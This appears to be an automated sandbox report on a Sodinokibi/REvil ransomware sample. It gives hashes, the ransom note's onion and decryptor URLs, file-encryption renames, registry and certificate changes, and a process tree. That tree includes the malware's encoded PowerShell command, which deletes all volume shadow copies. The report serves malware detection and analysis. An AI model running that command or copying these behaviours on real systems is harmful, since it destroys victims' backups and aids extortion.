Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows10_x64 -
resource
win10 -
submitted
20-08-2020 13:02
Static task
static1
Behavioral task
behavioral1
Sample
09e20223d059891d4712c1fd14423ac5aee9177bcb5e4c7e2d8778415f146499.bin.exe.dll
Resource
win7v200722
Behavioral task
behavioral2
Sample
09e20223d059891d4712c1fd14423ac5aee9177bcb5e4c7e2d8778415f146499.bin.exe.dll
Resource
win10
General
-
Target
09e20223d059891d4712c1fd14423ac5aee9177bcb5e4c7e2d8778415f146499.bin.exe.dll
-
Size
116KB
-
MD5
f9d060c4e1ef8bcda341ea2f490af006
-
SHA1
549f4014aec9e52cd8a4a1b304561c00278063a3
-
SHA256
09e20223d059891d4712c1fd14423ac5aee9177bcb5e4c7e2d8778415f146499
-
SHA512
57dacb3a98f429492381aaf2693ea4fc399d948c0a7dc6a9b3a45eed8474f3f0c8d84964834fd3f44f74b320d24a505b4255555f68c115ff553559493942fd87
Malware Config
Extracted
C:\iz7387-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/FD18DF36649D5926
http://decryptor.cc/FD18DF36649D5926
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Blacklisted process makes network request 87 IoCs
Processes:
rundll32.exeflow pid process 7 2832 rundll32.exe 10 2832 rundll32.exe 12 2832 rundll32.exe 14 2832 rundll32.exe 16 2832 rundll32.exe 18 2832 rundll32.exe 20 2832 rundll32.exe 22 2832 rundll32.exe 24 2832 rundll32.exe 26 2832 rundll32.exe 27 2832 rundll32.exe 28 2832 rundll32.exe 30 2832 rundll32.exe 32 2832 rundll32.exe 34 2832 rundll32.exe 36 2832 rundll32.exe 38 2832 rundll32.exe 41 2832 rundll32.exe 43 2832 rundll32.exe 45 2832 rundll32.exe 47 2832 rundll32.exe 49 2832 rundll32.exe 51 2832 rundll32.exe 53 2832 rundll32.exe 55 2832 rundll32.exe 57 2832 rundll32.exe 59 2832 rundll32.exe 61 2832 rundll32.exe 63 2832 rundll32.exe 65 2832 rundll32.exe 67 2832 rundll32.exe 69 2832 rundll32.exe 72 2832 rundll32.exe 74 2832 rundll32.exe 76 2832 rundll32.exe 78 2832 rundll32.exe 79 2832 rundll32.exe 81 2832 rundll32.exe 83 2832 rundll32.exe 85 2832 rundll32.exe 87 2832 rundll32.exe 89 2832 rundll32.exe 91 2832 rundll32.exe 94 2832 rundll32.exe 96 2832 rundll32.exe 98 2832 rundll32.exe 102 2832 rundll32.exe 104 2832 rundll32.exe 106 2832 rundll32.exe 108 2832 rundll32.exe 110 2832 rundll32.exe 112 2832 rundll32.exe 114 2832 rundll32.exe 116 2832 rundll32.exe 118 2832 rundll32.exe 120 2832 rundll32.exe 122 2832 rundll32.exe 124 2832 rundll32.exe 126 2832 rundll32.exe 128 2832 rundll32.exe 130 2832 rundll32.exe 132 2832 rundll32.exe 134 2832 rundll32.exe 136 2832 rundll32.exe -
Modifies extensions of user files 15 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
rundll32.exedescription ioc process File renamed C:\Users\Admin\Pictures\StopUnpublish.tif => \??\c:\users\admin\pictures\StopUnpublish.tif.iz7387 rundll32.exe File renamed C:\Users\Admin\Pictures\WaitConvert.raw => \??\c:\users\admin\pictures\WaitConvert.raw.iz7387 rundll32.exe File opened for modification \??\c:\users\admin\pictures\CompressSend.tiff rundll32.exe File renamed C:\Users\Admin\Pictures\DenyLock.png => \??\c:\users\admin\pictures\DenyLock.png.iz7387 rundll32.exe File renamed C:\Users\Admin\Pictures\EditSubmit.raw => \??\c:\users\admin\pictures\EditSubmit.raw.iz7387 rundll32.exe File renamed C:\Users\Admin\Pictures\GrantPush.raw => \??\c:\users\admin\pictures\GrantPush.raw.iz7387 rundll32.exe File renamed C:\Users\Admin\Pictures\CompressSend.tiff => \??\c:\users\admin\pictures\CompressSend.tiff.iz7387 rundll32.exe File renamed C:\Users\Admin\Pictures\ResetResume.tif => \??\c:\users\admin\pictures\ResetResume.tif.iz7387 rundll32.exe File opened for modification \??\c:\users\admin\pictures\UnlockSelect.tiff rundll32.exe File renamed C:\Users\Admin\Pictures\TraceGroup.tif => \??\c:\users\admin\pictures\TraceGroup.tif.iz7387 rundll32.exe File opened for modification \??\c:\users\admin\pictures\NewRevoke.tiff rundll32.exe File renamed C:\Users\Admin\Pictures\UnlockSelect.tiff => \??\c:\users\admin\pictures\UnlockSelect.tiff.iz7387 rundll32.exe File renamed C:\Users\Admin\Pictures\MountUnlock.tif => \??\c:\users\admin\pictures\MountUnlock.tif.iz7387 rundll32.exe File renamed C:\Users\Admin\Pictures\NewRevoke.tiff => \??\c:\users\admin\pictures\NewRevoke.tiff.iz7387 rundll32.exe File renamed C:\Users\Admin\Pictures\RemoveCompress.raw => \??\c:\users\admin\pictures\RemoveCompress.raw.iz7387 rundll32.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 5 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
rundll32.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\drjj9m6r.bmp" rundll32.exe -
Drops file in Program Files directory 33 IoCs
Processes:
rundll32.exedescription ioc process File opened for modification \??\c:\program files\SwitchRevoke.pcx rundll32.exe File opened for modification \??\c:\program files\RedoUnpublish.crw rundll32.exe File opened for modification \??\c:\program files\SendUninstall.xhtml rundll32.exe File opened for modification \??\c:\program files\SetConnect.rle rundll32.exe File opened for modification \??\c:\program files\SplitUnblock.crw rundll32.exe File opened for modification \??\c:\program files\UninstallConvert.M2V rundll32.exe File opened for modification \??\c:\program files\UninstallPop.xltx rundll32.exe File opened for modification \??\c:\program files\RegisterInstall.ps1xml rundll32.exe File opened for modification \??\c:\program files\SearchBlock.vssm rundll32.exe File opened for modification \??\c:\program files\ShowUnlock.jpg rundll32.exe File opened for modification \??\c:\program files\NewLimit.vssx rundll32.exe File opened for modification \??\c:\program files\SuspendGrant.jtx rundll32.exe File opened for modification \??\c:\program files\GroupEdit.mp4v rundll32.exe File opened for modification \??\c:\program files\RenameCompress.wvx rundll32.exe File opened for modification \??\c:\program files\UnlockStart.rm rundll32.exe File opened for modification \??\c:\program files\PingStep.emz rundll32.exe File opened for modification \??\c:\program files\SearchOptimize.zip rundll32.exe File opened for modification \??\c:\program files\AddFind.pdf rundll32.exe File opened for modification \??\c:\program files\CompressDismount.bmp rundll32.exe File opened for modification \??\c:\program files\DisablePush.xsl rundll32.exe File opened for modification \??\c:\program files\SyncResume.ppt rundll32.exe File opened for modification \??\c:\program files\OpenRequest.ex_ rundll32.exe File opened for modification \??\c:\program files\RenameSearch.ini rundll32.exe File opened for modification \??\c:\program files\RestoreBlock.dwg rundll32.exe File opened for modification \??\c:\program files\DenyFormat.avi rundll32.exe File opened for modification \??\c:\program files\LimitFormat.rtf rundll32.exe File opened for modification \??\c:\program files\SplitRestart.nfo rundll32.exe File opened for modification \??\c:\program files\EnterUninstall.dib rundll32.exe File opened for modification \??\c:\program files\GetRedo.ppsm rundll32.exe File opened for modification \??\c:\program files\NewUnprotect.dotx rundll32.exe File created \??\c:\program files\iz7387-readme.txt rundll32.exe File created \??\c:\program files (x86)\iz7387-readme.txt rundll32.exe File opened for modification \??\c:\program files\ConnectComplete.odp rundll32.exe -
Processes:
rundll32.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868 rundll32.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = 0f000000010000001400000009b9105c5bba24343ca7f341c624e183f6ee7c1b090000000100000054000000305206082b06010505070308060a2b0601040182370a030406082b0601050507030606082b0601050507030106082b0601050507030706082b0601050507030206082b0601050507030406082b0601050507030353000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000260000005300650063007400690067006f00200028004100640064005400720075007300740029000000620000000100000020000000687fa451382278fff0c8b11f8d43d576671c6eb2bceab413fb83d965d06d2ff2140000000100000014000000adbd987a34b426f7fac42654ef03bde024cb541a1d000000010000001000000006f9583c00a763c23fb9e065a3366d5503000000010000001400000002faf3e291435468607857694df5e45b6885186820000000010000003a040000308204363082031ea003020102020101300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3030303533303130343833385a170d3230303533303130343833385a306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100b7f71a33e6f200042d39e04e5bed1fbc6c0fcdb5fa23b6cede9b113397a4294c7d939fbd4abc93ed031ae38fcfe56d505ad69729945a80b0497adb2e95fdb8cabf37382d1e3e9141ad7056c7f04f3fe8329e74cac89054e9c65f0f789d9a403c0eac61aa5e148f9e87a16a50dcd79a4eaf05b3a671949c71b350600ac7139d38078602a8e9a869261890ab4cb04f23ab3a4f84d8dfce9fe1696fbbd742d76b44e4c7adee6d415f725a710837b37965a459a09437f7002f0dc29272dad03872db14a845c45d2a7db7b4d6c4eeaccd1344b7c92bdd430025fa61b9696a582311b7a7338f567559f5cd29d746b70a2b65b6d3426f15b2b87bfbefe95d53d5345a270203010001a381dc3081d9301d0603551d0e04160414adbd987a34b426f7fac42654ef03bde024cb541a300b0603551d0f040403020106300f0603551d130101ff040530030101ff3081990603551d2304819130818e8014adbd987a34b426f7fac42654ef03bde024cb541aa173a471306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74820101300d06092a864886f70d01010505000382010100b09be08525c2d623e20f9606929d41989cd9847981d91e5b14072336658fb0d877bbac416c47608351b0f9323de7fcf62613c78016a5bf5afc87cf787989219ae24c070a8635bcf2de51c4d296b7dc7e4eee70fd1c39eb0c0251142d8ebd16e0c1df4675e724adecf442b48593701067ba9d06354a18d32b7acc5142a17a63d1e6bba1c52bc236be130de6bd637e797ba7090d40ab6add8f8ac3f6f68c1a420551d445f59fa76221681520433c99e77cbd24d8a9911773883f561b313818b4710f9acdc80e9e8e2e1be18c9883cb1f31f1444cc604734976600fc7f8bd17806b2ee9cc4c0e5a9a790f200a2ed59e63261e559294d882175a7bd0bcc78f4e8604 rundll32.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = 0400000001000000100000001d3554048578b03f42424dbf20730a3f03000000010000001400000002faf3e291435468607857694df5e45b688518681d000000010000001000000006f9583c00a763c23fb9e065a3366d55140000000100000014000000adbd987a34b426f7fac42654ef03bde024cb541a620000000100000020000000687fa451382278fff0c8b11f8d43d576671c6eb2bceab413fb83d965d06d2ff20b00000001000000260000005300650063007400690067006f0020002800410064006400540072007500730074002900000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b06010505070308060a2b0601040182370a030406082b0601050507030606082b0601050507030106082b0601050507030706082b0601050507030206082b0601050507030406082b060105050703030f000000010000001400000009b9105c5bba24343ca7f341c624e183f6ee7c1b20000000010000003a040000308204363082031ea003020102020101300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3030303533303130343833385a170d3230303533303130343833385a306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100b7f71a33e6f200042d39e04e5bed1fbc6c0fcdb5fa23b6cede9b113397a4294c7d939fbd4abc93ed031ae38fcfe56d505ad69729945a80b0497adb2e95fdb8cabf37382d1e3e9141ad7056c7f04f3fe8329e74cac89054e9c65f0f789d9a403c0eac61aa5e148f9e87a16a50dcd79a4eaf05b3a671949c71b350600ac7139d38078602a8e9a869261890ab4cb04f23ab3a4f84d8dfce9fe1696fbbd742d76b44e4c7adee6d415f725a710837b37965a459a09437f7002f0dc29272dad03872db14a845c45d2a7db7b4d6c4eeaccd1344b7c92bdd430025fa61b9696a582311b7a7338f567559f5cd29d746b70a2b65b6d3426f15b2b87bfbefe95d53d5345a270203010001a381dc3081d9301d0603551d0e04160414adbd987a34b426f7fac42654ef03bde024cb541a300b0603551d0f040403020106300f0603551d130101ff040530030101ff3081990603551d2304819130818e8014adbd987a34b426f7fac42654ef03bde024cb541aa173a471306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74820101300d06092a864886f70d01010505000382010100b09be08525c2d623e20f9606929d41989cd9847981d91e5b14072336658fb0d877bbac416c47608351b0f9323de7fcf62613c78016a5bf5afc87cf787989219ae24c070a8635bcf2de51c4d296b7dc7e4eee70fd1c39eb0c0251142d8ebd16e0c1df4675e724adecf442b48593701067ba9d06354a18d32b7acc5142a17a63d1e6bba1c52bc236be130de6bd637e797ba7090d40ab6add8f8ac3f6f68c1a420551d445f59fa76221681520433c99e77cbd24d8a9911773883f561b313818b4710f9acdc80e9e8e2e1be18c9883cb1f31f1444cc604734976600fc7f8bd17806b2ee9cc4c0e5a9a790f200a2ed59e63261e559294d882175a7bd0bcc78f4e8604 rundll32.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = 19000000010000001000000045ed9bbc5e43d3b9ecd63c060db78e5c0f000000010000001400000009b9105c5bba24343ca7f341c624e183f6ee7c1b090000000100000054000000305206082b06010505070308060a2b0601040182370a030406082b0601050507030606082b0601050507030106082b0601050507030706082b0601050507030206082b0601050507030406082b0601050507030353000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000260000005300650063007400690067006f00200028004100640064005400720075007300740029000000620000000100000020000000687fa451382278fff0c8b11f8d43d576671c6eb2bceab413fb83d965d06d2ff2140000000100000014000000adbd987a34b426f7fac42654ef03bde024cb541a1d000000010000001000000006f9583c00a763c23fb9e065a3366d5503000000010000001400000002faf3e291435468607857694df5e45b688518680400000001000000100000001d3554048578b03f42424dbf20730a3f20000000010000003a040000308204363082031ea003020102020101300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3030303533303130343833385a170d3230303533303130343833385a306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100b7f71a33e6f200042d39e04e5bed1fbc6c0fcdb5fa23b6cede9b113397a4294c7d939fbd4abc93ed031ae38fcfe56d505ad69729945a80b0497adb2e95fdb8cabf37382d1e3e9141ad7056c7f04f3fe8329e74cac89054e9c65f0f789d9a403c0eac61aa5e148f9e87a16a50dcd79a4eaf05b3a671949c71b350600ac7139d38078602a8e9a869261890ab4cb04f23ab3a4f84d8dfce9fe1696fbbd742d76b44e4c7adee6d415f725a710837b37965a459a09437f7002f0dc29272dad03872db14a845c45d2a7db7b4d6c4eeaccd1344b7c92bdd430025fa61b9696a582311b7a7338f567559f5cd29d746b70a2b65b6d3426f15b2b87bfbefe95d53d5345a270203010001a381dc3081d9301d0603551d0e04160414adbd987a34b426f7fac42654ef03bde024cb541a300b0603551d0f040403020106300f0603551d130101ff040530030101ff3081990603551d2304819130818e8014adbd987a34b426f7fac42654ef03bde024cb541aa173a471306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74820101300d06092a864886f70d01010505000382010100b09be08525c2d623e20f9606929d41989cd9847981d91e5b14072336658fb0d877bbac416c47608351b0f9323de7fcf62613c78016a5bf5afc87cf787989219ae24c070a8635bcf2de51c4d296b7dc7e4eee70fd1c39eb0c0251142d8ebd16e0c1df4675e724adecf442b48593701067ba9d06354a18d32b7acc5142a17a63d1e6bba1c52bc236be130de6bd637e797ba7090d40ab6add8f8ac3f6f68c1a420551d445f59fa76221681520433c99e77cbd24d8a9911773883f561b313818b4710f9acdc80e9e8e2e1be18c9883cb1f31f1444cc604734976600fc7f8bd17806b2ee9cc4c0e5a9a790f200a2ed59e63261e559294d882175a7bd0bcc78f4e8604 rundll32.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = 5c0000000100000004000000000800000400000001000000100000001d3554048578b03f42424dbf20730a3f03000000010000001400000002faf3e291435468607857694df5e45b688518681d000000010000001000000006f9583c00a763c23fb9e065a3366d55140000000100000014000000adbd987a34b426f7fac42654ef03bde024cb541a620000000100000020000000687fa451382278fff0c8b11f8d43d576671c6eb2bceab413fb83d965d06d2ff20b00000001000000260000005300650063007400690067006f0020002800410064006400540072007500730074002900000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b06010505070308060a2b0601040182370a030406082b0601050507030606082b0601050507030106082b0601050507030706082b0601050507030206082b0601050507030406082b060105050703030f000000010000001400000009b9105c5bba24343ca7f341c624e183f6ee7c1b19000000010000001000000045ed9bbc5e43d3b9ecd63c060db78e5c20000000010000003a040000308204363082031ea003020102020101300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3030303533303130343833385a170d3230303533303130343833385a306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100b7f71a33e6f200042d39e04e5bed1fbc6c0fcdb5fa23b6cede9b113397a4294c7d939fbd4abc93ed031ae38fcfe56d505ad69729945a80b0497adb2e95fdb8cabf37382d1e3e9141ad7056c7f04f3fe8329e74cac89054e9c65f0f789d9a403c0eac61aa5e148f9e87a16a50dcd79a4eaf05b3a671949c71b350600ac7139d38078602a8e9a869261890ab4cb04f23ab3a4f84d8dfce9fe1696fbbd742d76b44e4c7adee6d415f725a710837b37965a459a09437f7002f0dc29272dad03872db14a845c45d2a7db7b4d6c4eeaccd1344b7c92bdd430025fa61b9696a582311b7a7338f567559f5cd29d746b70a2b65b6d3426f15b2b87bfbefe95d53d5345a270203010001a381dc3081d9301d0603551d0e04160414adbd987a34b426f7fac42654ef03bde024cb541a300b0603551d0f040403020106300f0603551d130101ff040530030101ff3081990603551d2304819130818e8014adbd987a34b426f7fac42654ef03bde024cb541aa173a471306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74820101300d06092a864886f70d01010505000382010100b09be08525c2d623e20f9606929d41989cd9847981d91e5b14072336658fb0d877bbac416c47608351b0f9323de7fcf62613c78016a5bf5afc87cf787989219ae24c070a8635bcf2de51c4d296b7dc7e4eee70fd1c39eb0c0251142d8ebd16e0c1df4675e724adecf442b48593701067ba9d06354a18d32b7acc5142a17a63d1e6bba1c52bc236be130de6bd637e797ba7090d40ab6add8f8ac3f6f68c1a420551d445f59fa76221681520433c99e77cbd24d8a9911773883f561b313818b4710f9acdc80e9e8e2e1be18c9883cb1f31f1444cc604734976600fc7f8bd17806b2ee9cc4c0e5a9a790f200a2ed59e63261e559294d882175a7bd0bcc78f4e8604 rundll32.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
rundll32.exepowershell.exepid process 2832 rundll32.exe 2832 rundll32.exe 3828 powershell.exe 3828 powershell.exe 3828 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
rundll32.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 2832 rundll32.exe Token: SeDebugPrivilege 3828 powershell.exe Token: SeBackupPrivilege 852 vssvc.exe Token: SeRestorePrivilege 852 vssvc.exe Token: SeAuditPrivilege 852 vssvc.exe Token: SeTakeOwnershipPrivilege 2832 rundll32.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
rundll32.exerundll32.exedescription pid process target process PID 4092 wrote to memory of 2832 4092 rundll32.exe rundll32.exe PID 4092 wrote to memory of 2832 4092 rundll32.exe rundll32.exe PID 4092 wrote to memory of 2832 4092 rundll32.exe rundll32.exe PID 2832 wrote to memory of 3828 2832 rundll32.exe powershell.exe PID 2832 wrote to memory of 3828 2832 rundll32.exe powershell.exe
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\09e20223d059891d4712c1fd14423ac5aee9177bcb5e4c7e2d8778415f146499.bin.exe.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:4092 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\09e20223d059891d4712c1fd14423ac5aee9177bcb5e4c7e2d8778415f146499.bin.exe.dll,#12⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2832 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3828
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3912
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:852